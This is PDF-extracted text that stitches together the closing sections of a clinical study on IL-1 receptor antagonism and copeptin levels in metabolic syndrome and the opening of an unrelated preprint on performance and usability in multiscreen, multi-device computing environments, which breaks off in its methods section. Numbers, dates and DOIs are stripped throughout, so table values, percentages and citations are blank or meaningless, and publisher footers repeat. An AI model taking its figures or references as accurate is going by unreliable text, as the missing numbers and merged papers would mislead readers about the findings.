(a–e) log-transformed copeptin values according to different subgroups. log-transformed copeptin values measured at baseline are shown on the y-axis according to different subgroups. (a) patients with and without chronic low-grade inflammation as defined by c-reactive protein values of < or ≥ mg/l at baseline. (b) diabetic status was determined by medical history and hba c cut-offs, ≥ . % as overt type diabetes and . – . % defined as prediabetes. (c and d) patients with or without any antihypertensive (c) and lipid-lowering (d) medication at baseline. (e) subgroup according to bmi at baseline. *p <  . , **p <  . . figure  change in copeptin levels from baseline according to treatment group copeptin values at day , and were subtracted from baseline and split according to the treatment group. the difference is depicted on the y-axis. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : activity. interestingly, and in support of this hypothesis, loncar et al. reported a reduction of copeptin levels after initiation of beta-blockade treatment in patients with heart failure and reduced ejection fraction ( ). as our study patients were already obese at study inclusion, we cannot conclude from our data whether obesity per se is the driving force for high copeptin levels. to investigate this hypothesis, data before and after weight gain through overfeeding or lack of physical exercise are required. however, surprisingly, we found only one abstract reporting study results on copeptin levels before and after weight loss so far. in this study by aktimur et  al., weight loss induced by bariatric surgery led to a significant decrease in copeptin levels, arguing for a causal role of obesity in high copeptin levels ( ). nevertheless, a bidirectional relationship between elevated avp/copeptin levels and obesity needs to be considered. in this regard, enhörning et al. showed in a longitudinal analysis that high copeptin levels at baseline predicted the development of abdominal obesity and type diabetes after . years of follow-up ( ). the authors suggested that avp might play a causal role in the development of these two conditions by enhancing gluconeogenesis and glycogenolysis in the liver through vasopressin a receptors ( , ) and through antilipolytic effects ( ). furthermore, it might lead to hyperinsulinemia through activation of vasopressin b table  effects of il- receptor antagonism on copeptin levels. copeptin (pmol/l) anakinra (n =  , n =  in study a, n =  in study b) placebo (n =  , study b) absolute values change from baseline absolute values change from baseline baseline . ( . – . ) – . ( . – . ) – day . ( . – . ) . (− . – . ) . ( . – . ) . (− . – . ) day . ( . – . ) . (− . – . ) . ( . – . ) − . (− . – . ) day . ( . – . ) − . (− . – . ) . ( . – . ) . (− . – . ) variables are summarized as medians (iqr). for the rows ‘baseline’ and ‘day ’, patients from both studies a and b were included. for ‘day ’ and ‘day ’, only data from study b were available. figure  (a–d) change in copeptin levels from baseline according to treatment group – subgroup analyses. patients were divided into subgroups according to the presence of (a) chronic low-grade inflammation, as defined by c-reactive protein values of < or ≥ mg/l at baseline, (b) diabetic status at baseline which was determined by medical history and hba c cut-offs, ≥ . % as overt type diabetes and . – . % defined as prediabetes, (c) according to bmi at baseline, (d) according to baseline copeptin levels in the highest tertile (≥ . pmol/l). copeptin values at day , and were subtracted from baseline and split according to the treatment group. the difference in copeptin values according to the subgroup is depicted on the y-axis. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin : receptors in the pancreas ( ). in summary, the available evidence suggests a bidirectional role of obesity for the secretion of avp/copeptin. according to our study, however, chronic low-grade inflammation is probably not the driving force behind the elevation of avp/copeptin levels and other mechanisms such as sympathetic nervous system activation must be investigated in future studies. strengths of our study are first that we used data from interventional studies, one being a placebo-controlled, double-blinded trial, which spares questions about association vs causality. second, we investigated short- term as well as longer-term effects of il- antagonism on avp/copeptin levels. third, both studies had similar eligibility criteria and visit procedures. in both trials patients had to be fasting and refrain from drinking water before the morning blood samplings, rendering reliable copeptin measurements. limitations of our study include that this is a secondary analysis, which always bears the risk of insufficient power for this endpoint. nevertheless, no tendency for a decrease in copeptin levels can be observed in our data. alternatively, another cytokine (e.g. tumor necrosis factor α) or cell nutrients (e.g. free fatty acids, glucose) may regulate avp. thus, anakinra alone might not be sufficiently potent to inhibit the drive of the other (unknown) factors on avp/copeptin secretion. in conclusion, the observed elevation of avp/copeptin levels in patients with metabolic syndrome is not due to systemic chronic activation of the il- system and other factors should be investigated to elucidate regulators of avp/copeptin levels. declaration of interest mcc received speaking honoraria from thermo fisher ag, the manufacturer of the copeptin assay. the remaining authors have nothing to disclose. funding mp and mcc are supported by grants awarded from the swiss national science foundation (mcc: snf- ; mp: snf- ). mcc received speaking honoraria from thermo fisher ag, the manufacturer of the copeptin assay. the remaining authors have nothing to disclose. financial support mp and mcc are supported by grants awarded from the swiss national science foundation (mcc: snf- ; mp: snf- ). acknowledgements the authors thank all patients for their participation, the staff of the laboratory and the department of endocrinology, diabetology & metabolism of the university hospital basel and of the kantonsspital aarau. the authors extend a special thanks to the study nurses for their most helpful support during the study. references eckel rh, grundy sm & zimmet pz. the metabolic syndrome. lancet – . (https://doi.org/ . /s - ( ) - ) melander o. vasopressin, from regulator to disease predictor for diabetes and cardiometabolic risk. annals of nutrition and metabolism (supplement ) – . (https://doi. org/ . / ) fenske wk, schnyder i, koch g, walti c, pfister m, kopp p, fassnacht m, strauss k & christ-crain m. release and decay kinetics of copeptin vs avp in response to osmotic alterations in healthy volunteers. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) enhörning s, wang tj, nilsson pm, almgren p, hedblad b, berglund g, struck j, morgenthaler ng, bergmann a, lindholm e, et al. plasma copeptin and the risk of diabetes mellitus. circulation – . (https://doi.org/ . / circulationaha. . ) abbasi a, corpeleijn e, meijer e, postmus d, gansevoort rt, gans rob, struck j, hillege hl, stolk rp, navis g, et al. sex differences in the association between plasma copeptin and incident type diabetes: the prevention of renal and vascular endstage disease (prevend) study. diabetologia – . (https:// doi.org/ . /s - - -x) enhörning s, bankir l, bouby n, struck j, hedblad b, persson m, morgenthaler ng, nilsson pm & melander o. copeptin, a marker of vasopressin, in abdominal obesity, diabetes and microalbuminuria: the prospective malmö diet and cancer study cardiovascular cohort. international journal of obesity – . (https://doi. org/ . /ijo. . ) asferg cl, andersen ub, linneberg a, goetze jp & jeppesen jl. copeptin, a surrogate marker for arginine vasopressin secretion, is associated with higher glucose and insulin concentrations but not higher blood pressure in obese men. diabetic medicine – . (https://doi.org/ . /dme. ) then c, kowall b, lechner a, meisinger c, heier m, koenig w, peters a, rathmann w & seissler j. plasma copeptin is associated with type diabetes in men but not in women in the population- based kora f study. acta diabetologica – . (https:// doi.org/ . /s - - - ) roussel r, boustany r el, bouby n, potier l, fumeron f, mohammedi k, balkau b, tichet j, bankir l, marre m, et al. plasma copeptin, avp gene variants, and incidence of type diabetes in a cohort from the community. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) vintilă m, gheorghiu ml, caragheorgheopol a, baculescu n, lichiardopol c, badiu c, coculescu m, grigorescu f & poiană c. increased copeptin levels in metabolic syndrome from a romanian population. journal of medicine and life – . riphagen ij, boertien we, alkhalaf a, kleefstra n, gansevoort rt, groenier kh, van hateren kjj, struck j, navis g, bilo hjg, et al. copeptin, a surrogate marker for arginine vasopressin, is associated with cardiovascular and all-cause mortality in patients with type diabetes (zodiac- ). diabetes care – . (https:// doi.org/ . /dc - ) zellweger c, wildi k, twerenbold r, reichlin t, naduvilekoot a, neuhaus jd, balmelli c, gabutti m, afify aal, ballarino p, et al. use of copeptin and high-sensitive cardiac troponin t for diagnosis and prognosis in patients with diabetes mellitus and suspected acute this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /jc. - https://doi.org/ . /circulationaha. . https://doi.org/ . /circulationaha. . https://doi.org/ . /s - - -x https://doi.org/ . /s - - -x https://doi.org/ . /ijo. . https://doi.org/ . /ijo. . https://doi.org/ . /dme. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /dc - https://doi.org/ . /dc - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : myocardial infarction. international journal of cardiology – . (https://doi.org/ . /j.ijcard. . . ) enhörning s, hedblad b, nilsson pm, engström g & melander o. copeptin is an independent predictor of diabetic heart disease and death. american heart journal – .e . (https://doi. org/ . /j.ahj. . . ) gallo-payet n & guillon g. regulation of adrenocortical function by vasopressin. hormone and metabolic research – . (https://doi.org/ . /s- - ) scott lv & dinan tg. vasopressin and the regulation of hypothalamic-pituitary-adrenal axis function: implications for the pathophysiology of depression. life sciences – . (https://doi.org/ . /s - ( ) - ) grazzini e, breton c, derick s, andres m, raufaste d, rickwaert f, boccara g, colson p, guérineau nc, serradeil-le gal c, et al. vasopressin receptors in human adrenal medulla and pheochromocytoma. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jcem. . . ) hems da & whitton pd. stimulation by vasopressin of glycogen breakdown and gluconeogenesis in the perfused rat liver. biochemical journal – . (https://doi.org/ . /bj ) hiroyama m, aoyagi t, fujiwara y, birumachi j, shigematsu y, kiwaki k, tasaki r, endo f & tanoue a. hypermetabolism of fat in v a vasopressin receptor knockout mice. molecular endocrinology – . (https://doi.org/ . /me. - ) filep j & rosenkranz b. mechanism of vasopressin-induced platelet aggregation. thrombosis research – . (https://doi. org/ . / - ( ) - ) maturi mf, martin se, markle d, maxwell m, burruss cr, speir e, greene r, ro ym, vitale d & green mv. coronary vasoconstriction induced by vasopressin. production of myocardial ischemia in dogs by constriction of nondiseased small vessels. circulation – . (https://doi.org/ . / .cir. . . ) enhörning s, struck j, wirfält e, hedblad b, morgenthaler ng & melander o. plasma copeptin, a unifying factor behind the metabolic syndrome. journal of clinical endocrinology & metabolism e –e . (https://doi.org/ . /jc. - ) wannamethee sg, welsh p, papacosta o, lennon l, whincup ph & sattar n. copeptin, insulin resistance, and risk of incident diabetes in older men. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) barchetta i, enhörning s, cimini fa, capoccia d, chiappetta c, cristofano c di, silecchia g, leonetti f, melander o & cavallo mg. elevated plasma copeptin levels identify the presence and severity of non-alcoholic fatty liver disease in obesity. bmc medicine . (https://doi.org/ . /s - - - ) ridker pm, howard cp, walter v, everett b, libby p, hensen j, thuren t & cantos pilot investigative group. effects of interleukin- β inhibition with canakinumab on hemoglobin a c, lipids, c-reactive protein, interleukin- , and fibrinogen a phase iib randomized, placebo-controlled trial. circulation – . (https://doi.org/ . / circulationaha. . ) larsen cm, faulenbach m, vaag a, vølund a, ehses ja, seifert b, mandrup-poulsen t & donath my. interleukin- -receptor antagonist in type diabetes mellitus. new england journal of medicine – . (https://doi.org/ . /nejmoa ) ridker pm, everett bm, thuren t, macfadyen jg, chang wh, ballantyne c, fonseca f, nicolau j, koenig w, anker sd, et al. antiinflammatory therapy with canakinumab for atherosclerotic disease. new england journal of medicine – . (https://doi.org/ . /nejmoa ) nakatsuru k, ohgo s, oki y & matsukura s. interleukin- (il- ) stimulates arginine vasopressin (avp) release from superfused rat hypothalamo-neurohypophyseal complexes independently of cholinergic mechanism. brain research – . (https://doi. org/ . / - ( ) -v) watanobe h & takebe k. intrahypothalamic perfusion with interleukin- -beta stimulates the local release of corticotropin- releasing hormone and arginine vasopressin and the plasma adrenocorticotropin in freely moving rats: a comparative perfusion of the paraventricular nucleus and the median eminence. neuroendocrinology – . (https://doi. org/ . / ) raber j, pich em, koob gf & bloom fe. il- beta potentiates the acetylcholine-induced release of vasopressin from the hypothalamus in vitro, but not from the amygdala. neuroendocrinology – . (https://doi.org/ . / ) wahab f, tazinafo lf, cárnio ec, aguila fa, batalhão me & rocha mj. interleukin- receptor antagonist decreases cerebrospinal fluid nitric oxide levels and increases vasopressin secretion in the late phase of sepsis in rats. endocrine – . (https://doi. org/ . /s - - - ) ebrahimi f, urwyler sa, straumann s, doerpfeld s, bernasconi l, neyer p, schuetz p, mueller b, donath my & christ-crain m. il- antagonism in men with metabolic syndrome and low testosterone: a randomized clinical trial. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) urwyler sa, schuetz p, ebrahimi f, donath my & christ-crain m. interleukin- antagonism decreases cortisol levels in obese individuals. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) friedewald wt, levy ri & fredrickson ds. estimation of the concentration of low-density lipoprotein cholesterol in plasma, without use of the preparative ultracentrifuge. clinical chemistry – . (https://doi.org/ . / clinchem/ . . ) saleem u, khaleghi m, morgenthaler ng, bergmann a, struck j, mosley th & kullo ij. plasma carboxy-terminal provasopressin (copeptin): a novel marker of insulin resistance and metabolic syndrome. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) kahn bb & flier js. obesity and insulin resistance. journal of clinical investigation – . (https://doi.org/ . / jci ) monteiro r & azevedo i. chronic inflammation in obesity and the metabolic syndrome. mediators of inflammation . (https://doi.org/ . / / ) aharon-hananel g, jörns a, lenzen s, raz i & weksler-zangen s. antidiabetic effect of interleukin- β antibody therapy through β-cell protection in the cohen diabetes – sensitive rat. diabetes – . (https://doi.org/ . /db - ) donath my. inflammation as a sensor of metabolic stress in obesity and type diabetes. endocrinology – . (https://doi. org/ . /en. - ) davy kp & orr js. sympathetic nervous system behavior in human obesity. neuroscience and biobehavioral reviews – . (https://doi.org/ . /j.neubiorev. . . ) schrier rw & goldberg jp. the physiology of vasopressin release and the pathogenesis of impaired water excretion in adrenal, thyroid, and edematous disorders. yale journal of biology and medicine – . loncar g, von haehling s, tahirovic e, inkrot s, mende m, sekularac n, lainscak m, apostolovic s, putnikovic b, edelmann f, et al. effect of beta blockade on natriuretic peptides and copeptin in elderly patients with heart failure and preserved or reduced ejection fraction: results from the cibis-eld trial. clinical biochemistry – . (https://doi.org/ . /j. clinbiochem. . . ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.ijcard. . . https://doi.org/ . /j.ahj. . . https://doi.org/ . /j.ahj. . . https://doi.org/ . /s- - https://doi.org/ . /s - ( ) - https://doi.org/ . /jcem. . . https://doi.org/ . /bj https://doi.org/ . /me. - https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://doi.org/ . / .cir. . . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://doi.org/ . /circulationaha. . https://doi.org/ . /circulationaha. . https://doi.org/ . /nejmoa https://doi.org/ . /nejmoa https://doi.org/ . / - ( ) -v https://doi.org/ . / - ( ) -v https://doi.org/ . / https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /clinchem/ . . https://doi.org/ . /clinchem/ . . https://doi.org/ . /jc. - https://doi.org/ . /jci https://doi.org/ . /jci https://doi.org/ . / / https://doi.org/ . /db - https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /j.neubiorev. . . https://doi.org/ . /j.clinbiochem. . . https://doi.org/ . /j.clinbiochem. . . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin : aktimur r, mete t, cetinkunar s, yaman m, beton o, avci e, erdem h & yildirim k. copeptin, a marker of vasopressin, decreases significantly in early state after bariatric surgery. endocrine abstracts ep . (https://doi.org/ . /endoabs. .ep ) whitton pd, rodrigues lm & hems da. stimulation by vasopressin, angiotensin and oxytocin of gluconeogenesis in hepatocyte suspensions. biochemical journal – . (https://doi. org/ . /bj ) keppens s & de wh. the nature of the hepatic receptors involved in vasopressin-induced glycogenolysis. bba – series general subjects – . (https://doi.org/ . / - ( ) - ) abu-basha ea, yibchok-anun s & hsu wh. glucose dependency of arginine vasopressin-induced insulin and glucagon release from the perfused rat pancreas. metabolism: clinical and experimental – . (doi: . /meta. . ) received in final form june accepted july accepted manuscript published online july this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /bj https://doi.org/ . /bj https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - . /meta. . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction methods study a: patients and trial design study b: patients and trial design laboratory analyses statistical analysis results baseline characteristics baseline copeptin levels effect of il- receptor antagonism on copeptin levels discussion declaration of interest funding financial support acknowledgements references performance, workload, and usability in a multiscreen, multi-device, information-rich environment a peer-reviewed version of this preprint was published in peerj on september . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. saleem jj, weiler dt. . performance, workload, and usability in a multiscreen, multi-device, information-rich environment. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. performance, workload, and usability in a multiscreen, multi- device, information-rich environment jason j saleem corresp., , , dustin t weiler , department of industrial engineering, university of louisville, louisville, kentucky, united states center for ergonomics, university of louisville, louisville, kentucky, united states department of industrial and systems engineering, university of wisconsin-madison, madison, wisconsin, united states corresponding author: jason j saleem email address: jason.saleem@louisville.edu potential benefits of multiscreen and multiple device environments were assessed using three different computing environments. a single factor, within-subject study was conducted with engineering students in a laboratory experiment. three levels for the computing environment factor included one with a desktop computer with a single monitor (control, condition a); one with a desktop with dual monitors, as well as a single tablet computer (condition b); and one with a desktop with a single monitor, as well as two tablet computers (condition c). there was no statistically significant difference in efficiency or workload when completing scenarios for the three computing environments. however, a dual monitor desktop with a single tablet computer (b) was the ideal computing environment for the information-rich engineering problem given to participants, supported by significantly fewer errors compared to condition c and significantly higher usability ratings compared to conditions a and c. a single desktop monitor with two tablet computers (c) did not provide any advantage compared to a single desktop monitor (a). peerj preprints | https://doi.org/ . /peerj.preprints. v | cc by . open access | rec: apr , publ: apr performance, workload, and usability in a multiscreen, multi-device, information-rich environment jason j. saleem , * and dustin t. weiler , department of industrial engineering, j.b. speed school of engineering, university of louisville, louisville, kentucky, usa center for ergonomics, university of louisville, louisville, ky, usa department of industrial and systems engineering, university of wisconsin-madison, madison, wisconsin, usa corresponding author: jason j. saleem, phd, department of industrial engineering, j.b. speed school of engineering, university of louisville, louisville, ky, usa, , tel: + , fax: + , email: jason.saleem@louisville.edu mailto:jason.saleem@louisville.edu abstract potential benefits of multiscreen and multiple device environments were assessed using three different computing environments. a single factor, within-subject study was conducted with engineering students in a laboratory experiment. three levels for the computing environment factor included one with a desktop computer with a single monitor (control, condition a); one with a desktop with dual monitors, as well as a single tablet computer (condition b); and one with a desktop with a single monitor, as well as two tablet computers (condition c). there was no statistically significant difference in efficiency or workload when completing scenarios for the three computing environments. however, a dual monitor desktop with a single tablet computer (b) was the ideal computing environment for the information-rich engineering problem given to participants, supported by significantly fewer errors compared to condition c and significantly higher usability ratings compared to conditions a and c. a single desktop monitor with two tablet computers (c) did not provide any advantage compared to a single desktop monitor (a). . introduction as having more than one computing device and/or monitors is becoming more feasible for individuals, a future trend is the of adoption of a multiscreen and multiple device approach to cope with distractions and multiple tasks. although this may seem counterintuitive, more screens and possibly more devices may help focus one’s attention rather than serve as a distraction, making multiple tasks viewable at a glance across multiple device screens (thompson, ). assuming each device has a different primary purpose, the additional screens may begin to approximate some of the inherent affordances of paper. that is, spreading out papers on a desk lets one’s eyes easily scan, which is a property hard to replicate on a single computer screen. thus, coordination of multiple computing devices and screens is a strategy that may potentially improve one’s performance in an information-rich environment by focusing their attention and reducing their mental workload. combining multiple screens and information devices has recently been studied qualitatively, in the field (jokela, ojala, & olsson, ). however, little quantitative experimentation has been done as to how a multi-device setup might affect task performance, which is the main objective of this study. the study described in this paper is a natural evolution of a previous study that involved paper-based workarounds to using the electronic health record (ehr) (saleem et al., ). in this study, we found that paper served as an important tool and assisted healthcare employees in their work. in other cases, paper use circumvented the intended ehr design, introduced potential gaps in documentation, and generated possible paths to medical error. investigating these paper processes helped us understand how the current exam room computing and ehr were not meeting the needs of the clinicians. the “forgotten” power of paper, including its ability to serve as a reliable cognitive memory aid and to help focus attention on important information, were lost as ehrs began to take shape. today, a multiscreen and multiple device work environment is becoming a trend. how to optimize the use and coordination of these multiple screens and devices is not known. this type of environment may help simulate the forgotten power of paper by replicating many of the lost affordances of paper-based processes, such as easy visual attention switches across screens, as well as the display of the most important information, separated by function or purpose across screens and devices. the objective of our study was to understand how to optimize this type of multiscreen and multiple device environment for improved user performance and satisfaction, and reduced mental workload. there exists a large body of human-computer interaction (hci) literature on the use of multiple screens, screen sizes, and form factors (e.g., desktop, tablet, smartphone). previous studies in academic (anderson, colvin, tobler, & lindsay, ; russell & wong, ) and hospital (poder, godbout, & bellemare, ) settings have demonstrated that performance is improved with the use of two monitors compared to one. for example, participants were quicker on tasks, did the work faster, and performed more work with fewer errors in multiscreen (dual screen) configurations than with a single screen (anderson et al., ). another study demonstrated that users do not tend to treat a second monitor as additional space. that is, participants reported rarely straddling a single window across two monitors. this is consistent with the physical gaps that are often left between monitors. instead, users typically maximize a design to fill one monitor entirely, leaving the other monitor free for other uses (grudin, ). the visual and physical separation between displays requires that users perform visual attention switches between displays (rashid, nacenta, & quigley, ). in one study, the authors utilized a divided attention paradigm to explore the effects of visual separation and physical discontinuities when distributing information across multiple displays. results showed reliable detrimental effects (about a % performance decrement) when information is separated within the visual field, but only when coupled with an offset in depth (tan & czerwinski, ). the optimal monitor size and position has also been studied. one study compared -, -, -, and -inch monitors and found that while participants’ performance was most efficient with the -inch monitor for excel and word tasks, users significantly preferred the -inch monitor (simmons, ). the majority ( %) of participants noted that the -inch monitor was too large or bulky for the average workspace (simmons & manahan, ; simmons, ). a limitation of this study was that screen resolution was not controlled for across the four screen sizes. although there has also been experimentation with very large displays (e.g., -inch monitor), there are several usability issues that are barriers to adopting larger displays, including: losing track of the cursor, distal access to information, window management problems (e.g., windows pop up in unexpected places), task management problems, configuration problems, and failure to leverage the periphery (czerwinski et al., ). therefore, separate smaller displays (e.g., -inch) seems to be advantageous as compared to a single, very large display. in terms of user-preferred position of computer monitors, one study found that participants placed larger displays farther and lower while maintaining the display top at or near eye height (shin & hegde, ). preferred position of the dual displays in landscape arrangement did not differ from that of a single display. therefore, it appears that the preferred display position varies with the vertical dimension of the overall viewable area of the display (shin & hegde, ). in addition to multiple monitors, handheld computers such as tablets and smartphones are becoming much more accessible in the workplace. for example, in clinical care settings, one research team noted that by making the most useful and appropriate data available on multiple devices and by facilitating the visual attention switching between those devices, staff members can efficiently integrate them in their workflow, allowing for faster and more accurate decisions (de backere f. et al., ). research on the performance differences with the form factor of handheld computers revealed a significant difference in completion times between the tablet and smart phone screen sizes ( . vs. . cm), but no differences in errors or subjectively assessed cognitive workload (byrd & caldwell, ). these previous studies were useful for understanding how to blend a multiple monitor environment with additional devices, such as tablet computers, for creating multiscreen environments to compare in our study. . methods . study design this research was approved by the institutional review board (irb) at the university of louisville (irb # . ). informed consent was obtained from each participant. the study was conducted in the center for ergonomics lab space at the university of louisville to test the three different computing work areas with engineering students. we used a counterbalanced, within-subject design, with ‘computing environment’ as the single independent variable. the three levels of computing environment are shown in figure . the presentation order of the three work area computing conditions were counterbalanced across the participants to control for a potential carry over learning effect. condition a had a single desktop computer with a - inch monitor (baseline condition). condition b had a desktop with dual -inch monitors, as well as a single tablet computer with a . -inch display. condition c had a desktop with a - inch monitor, as well as two tablet computers, with . inch displays. the -inch monitors were in fixed positions; however, the tablet computers were not fixed or propped up and could be moved based on users’ preferences. a standard keyboard and mouse were used as the input devices for the monitors. the desktop had a windows operating system and the tablets were ipad air ’s with the ios operating system. the input for the ipads were via touch screen and electronic keyboard (no external input devices were connected to the ipads). the same resolution ( x pixels) for the -inch monitors was used for each condition. the resolution of the ipads was x pixels. these three conditions were chosen based on a review of the literature to begin to understand how a multiscreen work area may affect performance and satisfaction in an information-rich environment. ---------------------------------------------- insert figure about here ---------------------------------------------- a previous study found that a -inch monitor is the optimal screen size based on performance and preference (simmons & manahan, ; simmons, ). therefore, a single -inch monitor work area served as a baseline condition (a) for comparison with the multiscreen conditions. several studies have found increased performance for dual-screen users (anderson et al., ; poder et al., ; russell & wong, ); a dual screen set up is part of condition (b). the dual-screens were fixed on the horizontal plane from the user’s perspective since varying screen position by depth was found to result in a performance decrement (tan & czerwinski, ). although pervious research supports the use of dual-screen monitors, it is not known how performance and satisfaction is impacted with the availability of additional screens from the use of mobile technologies. tablet computers were introduced in conditions (b) and (c) rather than other form factors such as smart phones since previous research demonstrated a significant difference in task completion times between the tablet and smart phone screen sizes (byrd & caldwell, ). one tablet computer was introduced in condition (b) to use in conjunction with the dual monitor desktop and two tablets computers were introduced in condition (c) to use on conjunction with a single monitor desktop. conditions (b) and (c) incorporated multiple screens across multiple form factors (desktop monitor and tablet computer) to understand the if multiple screens can help focus (or distract) users’ attention in an information-rich environment (thompson, ). . participants for this study, industrial engineering students ( males, females) participated between march-june . industrial engineering students were chosen based on the flow- charting tasks involved in the session; all students, except for one, had previously learned how to use a process flow chart from an undergraduate course on work design. the one exception was a graduate student with a mathematics undergraduate background. however, she was given an overview of process flow charting technique prior to data collection. participants were between the ages of and years old; the median age was . all participants, with the exception of one, reported little or no previous knowledge of race car driving, which was the application area for the experimental tasks. one participant had a great deal of knowledge about race car driving. ten of the participants currently used a dual-monitor set-up for their personal workstations and all but one participant had experience using tablet computers or ‘ in ’ computers (tablets that convert to a laptop). only one participant reported regularly using an ipad, which were the tablets used as part of this study. . dependent measures we used performance (efficiency and accuracy), workload, and usability as measures to demonstrate improved work area computing. specifically, improved efficiency and accuracy using a certain work area computing condition (a, b, or c), or time to complete tasks and reduction of errors, would suggest that the work area computing set-up better supports the users’ ability to efficiently and effectively complete information-rich tasks. similarly, through improved work area computing set-up, a decrease in mental workload (and thus required attentional resources) was predicted, as measured by the nasa task load index (tlx) (hart & staveland, ). we used unweighted tlx scores as the tlx dimensional weighting procedure has been found to be of limited benefit (hendy, hamilton, & landry, ; nygren, ). finally, an improved work area computing set-up would be expected to score higher on a validated usability survey; we used the computer usability satisfaction questionnaire (csuq) (lewis, ). each of these measures was used to compare the three experimental conditions for work area computing. . scenarios and tasks participants were asked to use flow process charts to document the steps that members of a national association for stock car auto racing (nascar) team perform during a pit stop. participants documented different members of the pit crew for each of the three work area computing conditions a, b, and c. the multiscreen/device conditions b and c can be described as “related parallel use” conditions (jokela et al., ), where participants work on completing a single task using more than one device in parallel. the three members of the pit crew for this experiment were front tire carrier, rear tire carrier, and jack man. participants first watched a demonstration / tutorial video that showed the roles of each member of the pit crew (interstate batteries, ). after this orientation, participants experienced each work area computing condition while completing a flow process chart to document a different pit crew member’s tasks while watching an actual pit stop video (armyranger [screen name], ). solutions for the flow process charts for each of the three roles were developed by one of the authors (d.t.w.), who possessed extensive knowledge of nascar racing, prior to the first participant (appendices a-c). we chose this particular pit stop scenario as an example of an information- rich task, where the use of multiple screens was potentially useful. table shows how the information was partitioned across the screens and devices for each condition. ---------------------------------------------- insert table about here ---------------------------------------------- . experimental space the laboratory in the center for ergonomics consisted of a participant room ( sq. ft.) within a larger, main laboratory space ( sq. ft.). the participant room and main laboratory space were connected with a door and a one-way mirror. the experimenter’s station was located just outside of the participant room. morae usability testing software connected the participant’s computer and experiment’s computer and was used to display the tasks and instructions to the participant. morae was also used to video record the direct screen capture of the participant’s interaction with the two desktop monitors. a web cam was used to record the participant’s interaction with the ipads, and was synced with the morae screen capture recording. time to complete the scenarios was automatically captured by morae. . procedure after completing a demographics form, participants were given a brief verbal overview of the purpose of the experiment and then oriented to the experimental space. after watching the pit stop demonstration (tutorial) video, participants completed a flow process chart for a member of the pit crew with the work area computing conditions a, b, and c, (counterbalanced across participants) with the information available to them listed in table . documents and information needed to complete this task, including a blank flow process chart, were provided to the participant by the experimenter though email. after accessing these information items through email, participants could display them as they wished (split screen or toggle between windows to view one at a time) as long as the information items were partitioned across the monitors and devices as prescribed in table . for all three conditions, the flow process chart was always located on monitor as completing the chart was the primary activity. all other information sources in table were supportive of completing the flow process chart. a dimension sheet of the pit stop area was provided so that participants could estimate distance for travel steps in the flow process chart. each of three pit crew roles (tire carrier, rear tire carrier, and jack man) were randomly assigned to the three conditions for each participant. after completing the scenarios for a given condition, participants were given the nasa tlx (computerized version) and csuq (paper- based version) surveys for mental workload and usability, respectively. thus participants completed each survey a total of three times, one for each work area computing condition a, b, and c. after completing the final condition, the debrief session commenced, with the experimenter conducting a semi-structure interview to explore each participant’s experiences with each condition (appendix d). the debrief interview was audio recorded by morae. participants received a $ gift card at the completion of the debrief session as compensation for their time. the entire participation time was scheduled for . hours for each volunteer. . hypotheses based on a review of the literature supporting the use of multiscreen and multi-device computing to improve performance in information-rich environments, as well as the possibility that multiple screens may help focus one’s attention when the information and functions are parsed distinctly across each screen, the following was predicted: hypothesis : participants will perform the scenarios in significantly less time and with significantly fewer errors with conditions b and c as compared to condition a (figure ). hypothesis : participants will experience significantly less mental workload when completing the scenarios with conditions b and c as compared to condition a. hypothesis : participants will rate the usability of the work area computing set-up in conditions b and c significantly higher as compared to condition a. hypothesis : there will be no significant differences for any of the dependent variables between condition b and condition c. . analysis the simulation study followed a single factor, 